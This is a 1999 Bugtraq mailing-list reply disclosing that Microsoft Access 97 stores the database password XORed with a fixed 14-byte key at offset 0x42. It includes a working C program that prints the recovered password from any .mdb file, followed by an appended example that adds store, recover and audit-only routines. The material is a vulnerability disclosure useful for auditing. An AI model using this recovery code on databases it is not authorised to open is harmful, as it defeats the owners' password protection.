Bugtraq mailing list archives

Re: Microsoft Access 97 Stores Database Password as Plaintext


From: jim () JTAN COM (Jim Paris)
Date: Tue, 9 Feb 1999 17:46:27 -0500


The following text was posted to USENET, and indexed on a Russian cypherpunk
site.  I found it when I was doing some work with Access 97 databases.  I
think you will agree that this particular "feature" makes the linked
database password issue moot.

Most definitely!

  Anyway, Access97 passwords are stored in the 13 bytes from offset
0x42 in a .mdb file.  Do a bitwise XOR with 0x86, 0xFB, 0xEC, 0x37,
0x5D, 0x44, 0x9C, 0xFA, 0xC6, 0x5E, 0x28, 0xE6, 0x13 to recover the
plaintext.  I think that if the first byte is 0x86, the password is
not checked.

Minor correction: the passwords can be a maximum of 14 bytes.  The last
XOR value is 0xD8.  Here's a quick program to test this lack of
security:

/* snip here */

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
        FILE *mdb; int i, ch;
        /* fixed 14-byte XOR key applied to the stored password */
        const int secret[14]={
                0x86,0xFB,0xEC,0x37,
                0x5D,0x44,0x9C,0xFA,
                0xC6,0x5E,0x28,0xE6,
                0x13,0xD8
        };

        if(argc<2) {
                fprintf(stderr,"usage: %s filename.mdb\n",argv[0]);
                return 1;
        }

        if((mdb=fopen(argv[1],"rb"))==NULL) {
                fprintf(stderr,"%s: can't open %s\n",argv[0],argv[1]);
                return 1;
        }

        /* the obfuscated password occupies 14 bytes at offset 0x42 */
        if(fseek(mdb,0x42,SEEK_SET)!=0) {
                fprintf(stderr,"%s: can't seek in %s\n",argv[0],argv[1]);
                fclose(mdb);
                return 1;
        }

        printf("The password is: ");
        for(i=0;i<14;i++)
        {
                /* stop at EOF (file too short) or at the NUL terminator;
                   ch is an int so EOF is not confused with a data byte */
                if((ch=fgetc(mdb))==EOF) break;
                if((ch^=secret[i])==0) break;
                putchar(ch);
        }
        if(i==0) printf("(none)");
        putchar('\n');

        fclose(mdb);
        return 0;
}

/* snip here */

-jim
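Added here as a worked example, not part of Jim's post or the quoted USENET text: the storage scheme described above, written as a pair of in-memory routines plus an audit check. Because XOR with a fixed key is its own inverse, one routine both produces and undoes the stored bytes, and a database with no password stores 0x00 XOR key, which is exactly why a first byte of 0x86 means "no password set". The `access97_file_has_password` helper only reports whether a file relies on this protection, without printing the password, which is what an inventory of .mdb files needs. All function names and the sample password are this example's own assumptions; the offset and key bytes are the ones stated in the post.

```c
#include <stdio.h>
#include <string.h>

/* Values from the post: 14 password bytes at file offset 0x42, stored as
   plaintext XOR this fixed key (the 14th byte corrected to 0xD8 above). */
#define ACCESS97_PW_OFFSET 0x42
#define ACCESS97_PW_LEN    14

static const unsigned char access97_key[ACCESS97_PW_LEN] = {
    0x86, 0xFB, 0xEC, 0x37, 0x5D, 0x44, 0x9C, 0xFA,
    0xC6, 0x5E, 0x28, 0xE6, 0x13, 0xD8
};

/* XOR with a fixed key is an involution: the same routine stores and recovers. */
void access97_xor(const unsigned char *in, unsigned char *out)
{
    size_t i;
    for (i = 0; i < ACCESS97_PW_LEN; i++)
        out[i] = in[i] ^ access97_key[i];
}

/* Produce the 14 stored bytes for a password (constructed for the demo;
   shorter passwords are zero-padded, matching the NUL terminator the
   recovery loop in the post relies on). */
void access97_store(const char *password, unsigned char stored[ACCESS97_PW_LEN])
{
    unsigned char plain[ACCESS97_PW_LEN] = {0};
    size_t n = strlen(password);
    if (n > ACCESS97_PW_LEN) n = ACCESS97_PW_LEN;
    memcpy(plain, password, n);
    access97_xor(plain, stored);
}

/* Audit check: no password means plain[0] == 0, so stored[0] == key[0] == 0x86.
   Returns 1 if a password is set, 0 if not. */
int access97_has_password(const unsigned char stored[ACCESS97_PW_LEN])
{
    return stored[0] != access97_key[0];
}

/* Recover the password into out (needs ACCESS97_PW_LEN + 1 bytes); returns its length. */
size_t access97_recover(const unsigned char stored[ACCESS97_PW_LEN], char *out)
{
    unsigned char plain[ACCESS97_PW_LEN];
    size_t i;
    access97_xor(stored, plain);
    for (i = 0; i < ACCESS97_PW_LEN && plain[i] != 0; i++)
        out[i] = (char)plain[i];
    out[i] = '\0';
    return i;
}

/* Inventory helper: report only whether an .mdb has a password set.
   Returns 1 (set), 0 (none) or -1 (unreadable or too short). */
int access97_file_has_password(const char *path)
{
    unsigned char stored[ACCESS97_PW_LEN];
    FILE *f = fopen(path, "rb");
    int ok = 0;
    if (!f) return -1;
    if (fseek(f, ACCESS97_PW_OFFSET, SEEK_SET) == 0 &&
        fread(stored, 1, ACCESS97_PW_LEN, f) == ACCESS97_PW_LEN)
        ok = 1;
    fclose(f);
    return ok ? access97_has_password(stored) : -1;
}

int main(int argc, char *argv[])
{
    unsigned char stored[ACCESS97_PW_LEN];
    char recovered[ACCESS97_PW_LEN + 1];
    int i;

    /* Constructed sample: obfuscate a demo password, then undo it. */
    access97_store("s3cret", stored);
    access97_recover(stored, recovered);
    printf("round trip: \"%s\", has_password=%d\n",
           recovered, access97_has_password(stored));

    /* The empty-password case stores the key itself, first byte 0x86. */
    access97_store("", stored);
    printf("no password: first stored byte 0x%02X, has_password=%d\n",
           stored[0], access97_has_password(stored));

    /* Any paths given on the command line are audited without disclosure. */
    for (i = 1; i < argc; i++) {
        int r = access97_file_has_password(argv[i]);
        printf("%s: %s\n", argv[i],
               r < 0 ? "unreadable" : r ? "password set" : "no password");
    }
    return 0;
}
```

Run it with no arguments for the in-memory demonstration, or pass one or more .mdb paths to get a "password set" / "no password" line per file.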
